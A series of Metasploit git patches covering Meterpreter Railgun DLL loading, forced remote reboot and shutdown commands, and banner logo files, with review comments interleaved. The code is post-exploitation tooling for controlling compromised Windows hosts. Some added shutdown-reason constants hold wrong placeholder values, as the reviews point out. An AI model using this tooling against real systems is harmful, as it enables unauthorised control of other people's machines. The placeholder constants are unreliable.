+ # + # Raises an exception if a dll with the given name has already been + # defined. + # + def add_dll(dll_name, windows_name=dll_name) + + if dlls.has_key? dll_name + raise "A DLL of name #{dll_name} has already been loaded." + end + + dlls[dll_name] = DLL.new(windows_name, constant_manager) + end + + + def known_dll_names + return BUILTIN_DLLS | dlls.keys + end + + # + # Attempts to provide a DLL instance of the given name. Handles lazy + # loading and caching. Note that if a DLL of the given name does not + # exist, returns nil + # + def get_dll(dll_name) + + # If the DLL is not local, we now either load it from cache or load it lazily. + # In either case, a reference to the dll is stored in the collection "dlls" + # If the DLL can not be found/created, no actions are taken + unless dlls.has_key? dll_name + # We read and write to @@cached_dlls and rely on state consistency + @@cache_semaphore.synchronize do + if @@cached_dlls.has_key? dll_name + dlls[dll_name] = @@cached_dlls[dll_name] + elsif BUILTIN_DLLS.include? dll_name + # I highly doubt this case will ever occur, but I am paranoid + if dll_name !~ /^\w+$/ + raise "DLL name #{dll_name} is bad. Correct Railgun::BUILTIN_DLLS" + end + + require 'rex/post/meterpreter/extensions/stdapi/railgun/def/def_' << dll_name + dll = Def.const_get('Def_' << dll_name).create_dll.freeze + + @@cached_dlls[dll_name] = dll + dlls[dll_name] = dll + end + end + + end + + return dlls[dll_name] + end + + # + # Fake having members like user32 and kernel32. + # reason is that + # ...user32.MessageBoxW() + # is prettier than + # ...dlls["user32"].functions["MessageBoxW"]() + # + def method_missing(dll_symbol, *args) + dll_name = dll_symbol.to_s + + unless known_dll_names.include? dll_name + raise "DLL #{dll_name} not found. Known DLLs: #{PP.pp(known_dll_names, '')}" + end + + dll = get_dll(dll_name) + + return DLLWrapper.new(dll, client) + end + + # + # Return a Windows constant matching +str+. 
+ # + def const(str) + return constant_manager.parse(str) + end + + # + # The multi-call shorthand (["kernel32", "ExitProcess", [0]]) + # + def multi(functions) + if @multicaller.nil? + @multicaller = MultiCaller.new(client, self) + end + + return @multicaller.call(functions) + end +end + +end; end; end; end; end; end From 04714893c8e95a960e0c3dc374c06906c81f2873 Mon Sep 17 00:00:00 2001 From: Meatballs1 Date: Fri, 4 Jan 2013 09:20:56 +0000 Subject: [PATCH 014/421] Add force option to reboot command --- .../extensions/stdapi/constants.rb | 63 +++++++++++++++++-- .../extensions/stdapi/sys/power.rb | 17 +++-- .../console/command_dispatcher/stdapi/sys.rb | 63 ++++++++++++++++--- 3 files changed, 121 insertions(+), 22 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb index 332dda8a76e6..b18b25af216c 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/constants.rb @@ -83,14 +83,14 @@ KEY_WOW64_64KEY = 0x00000100 KEY_WOW64_32KEY = 0x00000200 KEY_READ = (STANDARD_RIGHTS_READ | KEY_QUERY_VALUE | - KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY) & ~SYNCHRONIZE + KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY) & ~SYNCHRONIZE KEY_WRITE = (STANDARD_RIGHTS_WRITE | KEY_SET_VALUE | - KEY_CREATE_SUB_KEY) & ~SYNCHRONIZE + KEY_CREATE_SUB_KEY) & ~SYNCHRONIZE KEY_EXECUTE = KEY_READ KEY_ALL_ACCESS = (STANDARD_RIGHTS_ALL | KEY_QUERY_VALUE | - KEY_SET_VALUE | KEY_CREATE_SUB_KEY | - KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY | - KEY_CREATE_LINK) & ~SYNCHRONIZE + KEY_SET_VALUE | KEY_CREATE_SUB_KEY | + KEY_ENUMERATE_SUB_KEYS | KEY_NOTIFY | + KEY_CREATE_LINK) & ~SYNCHRONIZE ## # 
@@ -180,6 +180,59 @@ EWX_POWEROFF = 0x00000008 EWX_FORCEIFHUNG = 0x00000010 +## +# +# Shutdown Reason Codes +# +## +SHTDN_REASON_MINOR_DC_PROMOTION = 0x00000021 +SHTDN_REASON_MAJOR_APPLICATION = 0x00040000 +SHTDN_REASON_MAJOR_HARDWARE = 0x00010000 +SHTDN_REASON_FLAG_COMMENT_REQUIRED = 0x01000000 +SHTDN_REASON_FLAG_DIRTY_UI = 0x08000000 +SHTDN_REASON_MINOR_UNSTABLE = 0x00000006 +SHTDN_REASON_MINOR_SECURITYFIX_UNINSTALL = 0x00000018 +SHTDN_REASON_MINOR_ENVIRONMENT = 0x00000000 +SHTDN_REASON_MAJOR_LEGACY_API = 0x00070000 +SHTDN_REASON_MINOR_DC_DEMOTION = 0x00000022 +SHTDN_REASON_MINOR_SECURITYFIX = 0x00000012 +SHTDN_REASON_FLAG_CLEAN_UI = 0x04000000 +SHTDN_REASON_MINOR_HOTFIX = 0x00000011 +SHTDN_REASON_MINOR_CORDUNPLUGGED = 0x00000000 +SHTDN_REASON_MINOR_HOTFIX_UNINSTALL = 0x00000017 +SHTDN_REASON_FLAG_USER_DEFINED = 0x40000000 +SHTDN_REASON_MINOR_SYSTEMRESTORE = 0x00000001 +SHTDN_REASON_MINOR_OTHERDRIVER = 0x00000000 +SHTDN_REASON_MINOR_WMI = 0x00000015 +SHTDN_REASON_MINOR_INSTALLATION = 0x00000002 +SHTDN_REASON_MINOR_BLUESCREEN = 0x0000000F +SHTDN_REASON_MAJOR_SOFTWARE = 0x00030000 +SHTDN_REASON_MINOR_NETWORKCARD = 0x00000009 +SHTDN_REASON_MINOR_SERVICEPACK_UNINSTALL = 0x00000016 +SHTDN_REASON_MINOR_SERVICEPACK = 0x00000010 +SHTDN_REASON_MINOR_UPGRADE = 0x00000003 +SHTDN_REASON_FLAG_PLANNED = 0x80000000 +SHTDN_REASON_MINOR_MMC = 0x00000019 +SHTDN_REASON_MINOR_POWER_SUPPLY = 0x00000000 +SHTDN_REASON_MINOR_MAINTENANCE = 0x00000001 +SHTDN_REASON_VALID_BIT_MASK = 0x00000000 +SHTDN_REASON_MAJOR_NONE = 0x00000000 +SHTDN_REASON_MAJOR_POWER = 0x00060000 +SHTDN_REASON_FLAG_DIRTY_PROBLEM_ID_REQUIRED = 0x02000000 +SHTDN_REASON_MINOR_OTHER = 0x00000000 +SHTDN_REASON_MINOR_PROCESSOR = 0x00000008 +SHTDN_REASON_MAJOR_OTHER = 0x00000000 +SHTDN_REASON_MINOR_DISK = 0x00000007 +SHTDN_REASON_MINOR_NETWORK_CONNECTIVITY = 0x00000014 +SHTDN_REASON_MAJOR_OPERATINGSYSTEM = 0x00020000 +SHTDN_REASON_MINOR_HUNG = 0x00000005 +SHTDN_REASON_MINOR_TERMSRV = 0x00000020 +SHTDN_REASON_MINOR_NONE = 
0x00000000 +SHTDN_REASON_MINOR_RECONFIG = 0x00000004 +SHTDN_REASON_MAJOR_SYSTEM = 0x00050000 +SHTDN_REASON_MINOR_HARDWARE_DRIVER = 0x00000000 +SHTDN_REASON_MINOR_SECURITY = 0x00000013 +SHTDN_REASON_DEFAULT = SHTDN_REASON_MAJOR_OTHER | SHTDN_REASON_MINOR_OTHER ## # diff --git a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb index 001131651fb3..cb3d90f804dc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb @@ -28,33 +28,32 @@ class < [ false, "Execute process on the meterpreters current desktop" ], "-s" => [ true, "Execute process in a given session as the session user" ]) + # + # Options used by the 'reboot' command. + # + @@reboot_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-f" => [ true, "Force a reboot, valid values [1|2]" ]) + + # + # Options used by the 'shutdown' command. + # + @@shutdown_opts = Rex::Parser::Arguments.new( + "-h" => [ false, "Help menu." ], + "-f" => [ true, "Force a shutdown, valid values [1|2]" ]) + # # Options used by the 'reg' command. # @@ -311,14 +325,14 @@ def is_valid_pid?(pid) def cmd_ps(*args) processes = client.sys.process.get_processes @@ps_opts.parse(args) do |opt, idx, val| - case opt + case opt when "-h" cmd_ps_help return true when "-S" print_line "Filtering on process name..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| if val.nil? or val.empty? print_line "You must supply a search term!" return false 
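Review bot: Several of the added SHTDN_REASON_MINOR_* constants do not carry distinct values: `SHTDN_REASON_MINOR_CORDUNPLUGGED`, `_ENVIRONMENT`, `_OTHERDRIVER`, `_POWER_SUPPLY`, `_HARDWARE_DRIVER` and `_NONE` are all `0x00000000`, the same as `SHTDN_REASON_MINOR_OTHER`. `SHTDN_REASON_MINOR_SYSTEMRESTORE` also duplicates `SHTDN_REASON_MINOR_MAINTENANCE` at `0x00000001`, and `SHTDN_REASON_VALID_BIT_MASK` is zero, so masking with it would discard every reason bit. These look like placeholders; the values below are the ones I recall from the Windows SDK `reason.h` and should be checked against the header before merging. Only `SHTDN_REASON_DEFAULT` is used in the visible parts of this patch, so the likely impact is a later caller picking an affected name and having the shutdown recorded under the wrong reason.

```ruby
SHTDN_REASON_MINOR_NONE            = 0x000000ff
SHTDN_REASON_MINOR_POWER_SUPPLY    = 0x0000000a
SHTDN_REASON_MINOR_CORDUNPLUGGED   = 0x0000000b
SHTDN_REASON_MINOR_ENVIRONMENT     = 0x0000000c
SHTDN_REASON_MINOR_HARDWARE_DRIVER = 0x0000000d
SHTDN_REASON_MINOR_OTHERDRIVER     = 0x0000000e
SHTDN_REASON_MINOR_SYSTEMRESTORE   = 0x0000001a
SHTDN_REASON_VALID_BIT_MASK        = 0xc0ffffff
# … unchanged: the remaining SHTDN_REASON_* constants and SHTDN_REASON_DEFAULT …
```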
@@ -329,7 +343,7 @@ def cmd_ps(*args) when "-A" print_line "Filtering on arch..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| next if proc['arch'].nil? or proc['arch'].empty? if val.nil? or val.empty? or !(val == "x86" or val == "x86_64") print_line "You must select either x86 or x86_64" @@ -341,14 +355,14 @@ def cmd_ps(*args) when "-s" print_line "Filtering on SYSTEM processes..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| searched_procs << proc if proc["user"] == "NT AUTHORITY\\SYSTEM" end processes = searched_procs when "-U" print_line "Filtering on user name..." searched_procs = Rex::Post::Meterpreter::Extensions::Stdapi::Sys::ProcessList.new - processes.each do |proc| + processes.each do |proc| if val.nil? or val.empty? print_line "You must supply a search term!" return false @@ -371,7 +385,7 @@ def cmd_ps(*args) def cmd_ps_help print_line "Use the command with no arguments to see all running processes." print_line "The following options can be used to filter those results:" - + print_line @@ps_opts.usage end @@ -381,9 +395,25 @@ def cmd_ps_help # Reboots the remote computer. # def cmd_reboot(*args) + force = 0 + + if args.length == 1 and args[0].strip == "-h" + print( + "Usage: reboot [options]\n\n" + + "Reboot the remote machine.\n" + + @@reboot_opts.usage) + return true + end + + @@reboot_opts.parse(args) { |opt, idx, val| + case opt + when "-f" + force = val.to_i + end + } print_line("Rebooting...") - client.sys.power.reboot + client.sys.power.reboot(force, SHTDN_REASON_DEFAULT) end # 
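Review bot: In `cmd_reboot` the help check only fires when `-h` is the sole argument, and the `@@reboot_opts.parse` block has no `when "-h"` branch, so `reboot -f 1 -h` falls through and reboots the host instead of printing usage. The `-f` value is also taken with `val.to_i` and passed on unchecked although the option text says the valid values are [1|2]; non-numeric input silently becomes 0. For a command this disruptive, both cases should stop before `client.sys.power.reboot` is called, as sketched below in the `print_line` / `return false` style that `cmd_ps` already uses. `cmd_shutdown` in the later hunk has the same two gaps and wants the same change.

```ruby
def cmd_reboot(*args)
	force = 0

	@@reboot_opts.parse(args) { |opt, idx, val|
		case opt
		when "-h"
			print(
				"Usage: reboot [options]\n\n" +
				"Reboot the remote machine.\n" +
				@@reboot_opts.usage)
			return true
		when "-f"
			force = val.to_i
			unless [1, 2].include?(force)
				print_line "You must select either 1 or 2 for -f"
				return false
			end
		end
	}
	# … unchanged: print_line("Rebooting...") and the client.sys.power.reboot call …
```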
@@ -683,9 +713,26 @@ def cmd_sysinfo(*args) # Shuts down the remote computer. # def cmd_shutdown(*args) + force = 0 + + if args.length == 1 and args[0].strip == "-h" + print( + "Usage: shutdown [options]\n\n" + + "Shutdown the remote machine.\n" + + @@shutdown_opts.usage) + return true + end + + @@shutdown_opts.parse(args) { |opt, idx, val| + case opt + when "-f" + force = val.to_i + end + } + print_line("Shutting down...") - client.sys.power.shutdown + client.sys.power.shutdown(force, SHTDN_REASON_DEFAULT) end From a0ba2f4951fda3d1f32dfec63d6f7870d4398145 Mon Sep 17 00:00:00 2001 
From: Tod Beardsley Date: Wed, 9 Jan 2013 19:54:08 -0600 Subject: [PATCH 015/421] Seperate data from code Banners are content more than anything. --- lib/msf/ui/banner.rb | 308 ++---------------------- lib/msf/ui/logos/3kom-superhack.txt | 19 ++ lib/msf/ui/logos/branded-longhorn.txt | 10 + lib/msf/ui/logos/cow-head.txt | 17 ++ lib/msf/ui/logos/cowsay.txt | 10 + lib/msf/ui/logos/figlet.txt | 7 + lib/msf/ui/logos/i-heart-shells.txt | 9 + lib/msf/ui/logos/metasploit-shield.txt | 22 ++ lib/msf/ui/logos/missile-command.txt | 30 +++ lib/msf/ui/logos/ninja.txt | 31 +++ lib/msf/ui/logos/null-pointer-deref.txt | 38 +++ lib/msf/ui/logos/r7-metasploit.txt | 16 ++ lib/msf/ui/logos/test.rb | 5 + lib/msf/ui/logos/wake-up-neo.txt | 25 ++ lib/msf/ui/logos/workflow-cartoon.txt | 22 ++ 15 files changed, 285 insertions(+), 284 deletions(-) create mode 100644 lib/msf/ui/logos/3kom-superhack.txt create mode 100644 lib/msf/ui/logos/branded-longhorn.txt create mode 100644 lib/msf/ui/logos/cow-head.txt create mode 100644 lib/msf/ui/logos/cowsay.txt create mode 100644 lib/msf/ui/logos/figlet.txt create mode 100644 lib/msf/ui/logos/i-heart-shells.txt create mode 100644 lib/msf/ui/logos/metasploit-shield.txt create mode 100644 lib/msf/ui/logos/missile-command.txt create mode 100644 lib/msf/ui/logos/ninja.txt create mode 100644 lib/msf/ui/logos/null-pointer-deref.txt create mode 100644 lib/msf/ui/logos/r7-metasploit.txt create mode 100644 lib/msf/ui/logos/test.rb create mode 100644 lib/msf/ui/logos/wake-up-neo.txt create mode 100644 lib/msf/ui/logos/workflow-cartoon.txt diff --git a/lib/msf/ui/banner.rb b/lib/msf/ui/banner.rb index c30dc8cdf6f2..d02f48560cea 100644 --- a/lib/msf/ui/banner.rb +++ b/lib/msf/ui/banner.rb 
@@ -10,301 +10,41 @@ module Ui module Banner Logos = - [ -%Q{ -%whiCall trans opt: received. 2-19-98 13:24:18 REC:Loc - - Trace program: running - - wake up, Neo... - %bldthe matrix has you%clr - follow the white rabbit. - - knock, knock, Neo. - - (`. ,-, - ` `. ,;' / - `. ,'/ .' - `. X /.' - .-;--''--.._` ` ( - .' / ` - , ` ' Q ' - , , `._ \\ - ,.| ' `-.;_' - : . ` ; ` ` --,.._; - ' ` , ) .' - `._ , ' /_ - ; ,''-,;' ``- - ``-..__``--` -%clr}, - -%Q{%whi - _---------. - .' ####### ;." - .---,. ;@ @@`; .---,.. -." @@@@@'.,'@@ @@@@@',.'@@@@ ". -'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; - `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' - "--'.@@@ -.@ @ ,'- .'--" - ".@' ; @ @ `. ;' - |@@@@ @@@ @ . - ' @@@ @@ @@ , - `.@@@@ @@ . - ',@@ @ ; _____________ - ( 3 C ) /|___ / Metasploit! \\ - ;@'. __*__,." \\|--- \\_____________/ - '(.,...."/ -%clr}, -' -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%%% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%%%% %% %%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%% %%%%% -%%%% %% %% % %% %% %%%%% % %%%% %% %%%%%% %% -%%%% %% %% % %%% %%%% %%%% %% %%%% %%%% %% %% %% %%% %% %%% %%%%% -%%%% %%%%%% %% %%%%%% %%%% %%% %%%% %% %% %%% %%% %% %% %%%%% -%%%%%%%%%%%% %%%% %%%%% %% %% % %% %%%% %%%% %%% %%% % -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%% -%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -', -' - _ _ -/ \ /\ __ _ __ /_/ 
__ -| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ -| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| -|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ - |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ -', -%Q{ -%whiIIIIII %reddTb.dTb%clr _.---._ -%whi II %red4' v 'B%clr .'"".'/|\`.""'. -%whi II %red6. .P%clr : .' / | \ `. : -%whi II %red'T;. .;P'%clr '.' / | \ `.' -%whi II %red'T; ;P'%clr `. / | \ .' -%whiIIIIII %red'YvP'%clr `-.__|__.-' - -I love shells --egypt -}, -' - , , - / \ - ((__---,,,---__)) - (_) O O (_)_________ - \ _ / |\ - o_o \ M S F | \ - \ _____ | * - ||| WW||| - ||| ||| -', -' -# cowsay++ - ____________ -< metasploit > - ------------ - \ ,__, - \ (oo)____ - (__) )\ - ||--|| * -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld3Kom SuperHack II Logon%clr | -|______________________________________________________________________________| -| | -| | -| | -| User Name: [ %redsecurity%clr ] | -| | -| Password: [ ] | -| | -| | -| | -| %bld[ OK ]%clr | -|______________________________________________________________________________| -| | -|______________________________________________________________________________| -%clr -', - - -'%clr - ______________________________________________________________________________ -| | -| %bld%grnMETASPLOIT CYBER MISSILE COMMAND V4%clr | -|______________________________________________________________________________| - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr . %yel/%clr %yel/%clr x - %yel\%clr %yel/%clr %yel/%clr - %yel\%clr %yel/%clr + %yel/%clr - %yel\%clr + %yel/%clr %yel/%clr - * %yel/%clr %yel/%clr - %yel/%clr . %yel/%clr - X %yel/%clr %yel/%clr X - %yel/%clr %red###%clr - %yel/%clr %red# %bld%%clr%red #%clr - %yel/%clr %red###%clr - . %yel/%clr - . %yel/%clr . %red*%clr . 
- %yel/%clr - * - + %red*%clr - - %bld^%clr -#### __ __ __ ####### __ __ __ #### -#### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr ########### %yel/%clr %yel\%clr %yel/%clr %yel\%clr %yel/%clr %yel\%clr #### -################################################################################ -################################################################################ -# %bldWAVE 4%clr ######## %bldSCORE 31337%clr ################################## %bldHIGH FFFFFFFF%clr # -################################################################################ -%clr -', - - -' -%clr%whi -Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f -EFLAGS: 00010046 -eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001 -esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60 -ds: 0018 es: 0018 ss: 0018 -Process Swapper (Pid: 0, process nr: 0, stackpage=80377000) - -%bld -Stack: 90909090990909090990909090 - 90909090990909090990909090 - 90909090.90909090.90909090 - 90909090.90909090.90909090 - 90909090.90909090.09090900 - 90909090.90909090.09090900 - .......................... - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - ccccccccc................. - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .................ccccccccc - cccccccccccccccccccccccccc - cccccccccccccccccccccccccc - .......................... - ffffffffffffffffffffffffff - ffffffff.................. - ffffffffffffffffffffffffff - ffffffff.................. - ffffffff.................. - ffffffff.................. -%clr - -%yelCode: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N4 00 00 00 00%clr -Aiee, Killing Interrupt handler -%redKernel panic: Attempted to kill the idle task! 
-In swapper task - not syncing -%clr -', -' -%clr -%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr -%bluMMMMMMMMMMM MMMMMMMMMM%clr -%bluMMMN$ vMMMM%clr -%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMN NMMMMMMM%clr %bluJMMMM%clr -%bluMMMNl%clr %bldMMMMMMMMMNmmmNMMMMMMMMM%clr %bluJMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMMMMMMMMMMMMMMMMMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMMM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldMMMNM MMMMMMM MMMMM%clr %blujMMMM%clr -%bluMMMNI%clr %bldWMMMM MMMMMMM MMMM#%clr %bluJMMMM%clr -%bluMMMMR%clr %bld?MMNM MMMMM%clr %blu.dMMMM%clr -%bluMMMMNm%clr %bld`?MMM MMMM`%clr %bludMMMMM%clr -%bluMMMMMMN%clr %bld?MM MM?%clr %bluNMMMMMN%clr -%bluMMMMMMMMNe%clr %bluJMMMMMNMMM%clr -%bluMMMMMMMMMMNm,%clr %blueMMMMMNMMNMM%clr -%bluMMMMNNMNMMMMMNx%clr %bluMMMMMMNMMNMMNM%clr -%bluMMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM%clr -%clr -', -' -%clr ######## # - ################# # - ###################### # - ######################### # - ############################ - ############################## - ############################### - ############################### - ############################## - # ######## # - %red##%clr %red###%clr #### ## - ### ### - #### ### - #### ########## #### - ####################### #### - #################### #### - ################## #### - ############ ## - ######## ### - ######### ##### - ############ ###### - ######## ######### - ##### ######## - ### ######### - ###### ############ - ####################### - # # ### # # ## - ######################## - ## ## ## ## -%clr -', -%Q{ - %whi+-------------------------------------------------------+ - %whi| METASPLOIT by Rapid7 | - %whi+---------------------------+---------------------------+ - %whi| %blu__________________ %whi| | - %whi| %yel==c%blu(______(%yelo%blu(______(_%yel() %whi| %grn|""""""""""""|======\[%red*** %whi| - %whi| 
%blu)%yel=%blu\\\ %whi| %grn| %whiEXPLOIT %grn\\ %whi| - %whi| %blu// \\\\ %whi| %grn|_____________\\_______ %whi| - %whi| %blu// \\\\ %whi| %grn|==\[%whimsf >%grn\]============\\ %whi| - %whi| %blu// \\\\ %whi| %grn|______________________\\ %whi| - %whi| %blu// %whiRECON %blu\\\\ %whi| %grn\\(@)(@)(@)(@)(@)(@)(@)/ %whi| - %whi| %blu// \\\\ %whi| %grn********************* %whi| - %whi+---------------------------+---------------------------+ - %whi| o O o | %yel\\'\\/\\/\\/'/ %whi| - %whi| o O | %yel)%whi======%yel( %whi| - %whi| o | %yel.' %whiLOOT %yel'. %whi| - %whi| %red|^^^^^^^^^^^^^^\|l%red___ %whi| %yel/ %grn_||__ %yel\\ %whi| - %whi| %red| %whiPAYLOAD %red|%whi""\\%red___, %whi| %yel/ %grn(_||_ %yel\\ %whi| - %whi| %red|________________|__|)__| %whi| %yel| %grn__||_) %yel| %whi| - %whi| %red|(@)(@)"""**|(@)(@)**|(@) %whi| %yel" %grn|| %yel" %whi| - %whi| %yel= = = = = = = = = = = = %whi| %yel'--------------' %whi| - %whi+---------------------------+---------------------------+%clr - %clr -},] - - - + %w{ + wake-up-neo.txt + cow-head.txt + r7-metasploit.txt + figlet.txt + i-heart-shells.txt + branded-longhorn.txt + cowsay.txt + 3kom-superhack.txt + missile-command.txt + null-pointer-deref.txt + metasploit-shield.txt + ninja.txt + workflow.txt + } # # Returns a random metasploit logo. # + + def self.readfile(fname) + base = File.expand_path(File.dirname(__FILE__)) + File.open(File.join(base, "logos", fname)) {|f| f.read f.stat.size} + end + def self.to_s if ENV['GOCOW'] case rand(2) when 0 - Logos[1] + self.readfile Logos[1] when 1 - Logos[5] + self.readfile Logos[5] end else - Logos[rand(Logos.length)] + self.readfile Logos[rand(Logos.length)] end end diff --git a/lib/msf/ui/logos/3kom-superhack.txt b/lib/msf/ui/logos/3kom-superhack.txt new file mode 100644 index 000000000000..a2097f972ae0 --- /dev/null +++ b/lib/msf/ui/logos/3kom-superhack.txt 
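Review bot: The new `Logos` list names `workflow.txt`, but the file this commit creates is `lib/msf/ui/logos/workflow-cartoon.txt`, so `readfile` will raise `Errno::ENOENT` whenever `rand` picks that entry, since `File.open` here has no rescue. Either list `workflow-cartoon.txt` or rename the file. The `# Returns a random metasploit logo.` comment now sits above `readfile` rather than `to_s`. Moving it down and giving `readfile` its own comment (`# Reads a banner file from the logos directory next to this file.`) would keep the docs accurate. `f.read f.stat.size` can simply be `f.read`.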
@@ -0,0 +1,19 @@ +%clr + ______________________________________________________________________________ +| | +| %bld3Kom SuperHack II Logon%clr | +|______________________________________________________________________________| +| | +| | +| | +| User Name: [ %redsecurity%clr ] | +| | +| Password: [ ] | +| | +| | +| | +| %bld[ OK ]%clr | +|______________________________________________________________________________| +| | +|______________________________________________________________________________| +%clr diff --git a/lib/msf/ui/logos/branded-longhorn.txt b/lib/msf/ui/logos/branded-longhorn.txt new file mode 100644 index 000000000000..df7e2f745f43 --- /dev/null +++ b/lib/msf/ui/logos/branded-longhorn.txt @@ -0,0 +1,10 @@ + + , , + / \ + ((__---,,,---__)) + (_) O O (_)_________ + \ _ / |\ + o_o \ M S F | \ + \ _____ | * + ||| WW||| + ||| ||| diff --git a/lib/msf/ui/logos/cow-head.txt b/lib/msf/ui/logos/cow-head.txt new file mode 100644 index 000000000000..16ed1021d6b7 --- /dev/null +++ b/lib/msf/ui/logos/cow-head.txt @@ -0,0 +1,17 @@ +%whi + _---------. + .' ####### ;." + .---,. ;@ @@`; .---,.. +." @@@@@'.,'@@ @@@@@',.'@@@@ ". +'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @; + `.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .' + "--'.@@@ -.@ @ ,'- .'--" + ".@' ; @ @ `. ;' + |@@@@ @@@ @ . + ' @@@ @@ @@ , + `.@@@@ @@ . + ',@@ @ ; _____________ + ( 3 C ) /|___ / Metasploit! \\ + ;@'. __*__,." \\|--- \\_____________/ + '(.,...."/ +%clr diff --git a/lib/msf/ui/logos/cowsay.txt b/lib/msf/ui/logos/cowsay.txt new file mode 100644 index 000000000000..7b34488352fe --- /dev/null +++ b/lib/msf/ui/logos/cowsay.txt @@ -0,0 +1,10 @@ + +# cowsay++ + ____________ +< metasploit > + ------------ + \ ,__, + \ (oo)____ + (__) )\ + ||--|| * + diff --git a/lib/msf/ui/logos/figlet.txt b/lib/msf/ui/logos/figlet.txt new file mode 100644 index 000000000000..1567ea1774f8 --- /dev/null +++ b/lib/msf/ui/logos/figlet.txt 
@@ -0,0 +1,7 @@ + _ _ +/ \ /\ __ _ __ /_/ __ +| |\ / | _____ \ \ ___ _____ | | / \ _ \ \ +| | \/| | | ___\ |- -| /\ / __\ | -__/ | || | || | |- -| +|_| | | | _|__ | |_ / -\ __\ \ | | | | \__/| | | |_ + |/ |____/ \___\/ /\ \\\\___/ \/ \__| |_\ \___\ + diff --git a/lib/msf/ui/logos/i-heart-shells.txt b/lib/msf/ui/logos/i-heart-shells.txt new file mode 100644 index 000000000000..aeaff31aaae3 --- /dev/null +++ b/lib/msf/ui/logos/i-heart-shells.txt @@ -0,0 +1,9 @@ +%whiIIIIII %reddTb.dTb%clr _.---._ +%whi II %red4' v 'B%clr .'"".'/|\`.""'. +%whi II %red6. .P%clr : .' / | \ `. : +%whi II %red'T;. .;P'%clr '.' / | \ `.' +%whi II %red'T; ;P'%clr `. / | \ .' +%whiIIIIII %red'YvP'%clr `-.__|__.-' + +I love shells --egypt + diff --git a/lib/msf/ui/logos/metasploit-shield.txt b/lib/msf/ui/logos/metasploit-shield.txt new file mode 100644 index 000000000000..7f8648754fe2 --- /dev/null +++ b/lib/msf/ui/logos/metasploit-shield.txt @@ -0,0 +1,22 @@ +%clr +%bluMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM%clr +%bluMMMMMMMMMMM MMMMMMMMMM%clr +%bluMMMN$ vMMMM%clr +%bluMMMNl%clr %bldMMMMM MMMMM%clr %bluJMMMM%clr +%bluMMMNl%clr %bldMMMMMMMN 